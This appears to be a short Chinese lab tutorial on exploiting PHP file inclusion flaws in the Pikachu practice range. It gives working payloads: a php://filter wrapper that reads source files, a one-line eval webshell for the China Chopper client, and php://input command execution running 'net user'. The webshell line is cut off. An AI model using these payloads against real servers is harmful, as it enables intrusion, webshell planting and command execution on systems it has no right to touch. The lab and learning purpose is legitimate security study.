包含漏洞-读写文件以及执行命令
2023-02-18 16:36:25 时间
包含漏洞可以读写文件以及执行命令
读文件:
最好转化为base64,防止有特殊字符显示不出来
php://filter/read=convert.base64-encode/resource=【文件名】
用pikachu靶场演示: 读一下当前展示的这个PHP内容
写文件:
写入一句话木马 我用的是菜刀马 <?php @eval(
用菜刀连接:连接密码 123 由于是在当前文件夹写入的木马文件,所以是在fi_remote.php 同一目录下的
命令执行:
- phpStudy 只有在allow _url_include为on的时候才可以使用
- phpStudy 下找到php.ini打开,查找 disable_functions = 将其清空删掉重启apache 才能看到结果
需要修改一个地方 参数等于文件的地方 要改成 php://input
比如 http://192.168.56.128/pikachu/vul/fileinclude/fi_local.php?filename=file1.php
修改 http://192.168.56.128/pikachu/vul/fileinclude/fi_local.php?filename=php://input
提交数据包为:<?php system('net user');?>
相关文章
- 使用Java8 Stream API对Map按键或值进行排序
- 最简破解-java代码热加载热部署IDEA插件JRebel
- Java Stream函数式编程图文详解(二):管道数据处理
- Java Stream函数式编程案例图文详解
- 解析Java-throw抛出异常详细过程
- 一文详解Java日志框架JUL
- 在Java虚拟机上班是一种怎样的体验?
- 看过无数Java GC文章,这5个问题你也未必知道!
- JAVA只要掌握内部类,多继承和单继承都不是问题
- 今儿直白的用盖房子为例,给你讲讲Java建造者模式
- 用实例带你深入理解Java内存模型
- 你知道,java项目中是如何获取文件地址的吗?
- 【架构师(第十五篇)】脚手架之创建项目模板开发
- 【架构师(第十六篇)】脚手架之创建项目模板的下载与更新
- 【架构师(第十八篇)】脚手架之项目模板的安装
- 【架构师(第十九篇)】脚手架之组件库模板开发
- 【架构师(第二十篇)】脚手架之自定义模板及第一阶段总结
- 【架构师(第二十一篇)】编辑器开发之需求分析和架构设计
- 【架构师(第二十二篇)】编辑器开发之项目整体搭建
- 【架构师(第二十三篇)】编辑器开发之画布区域组件的渲染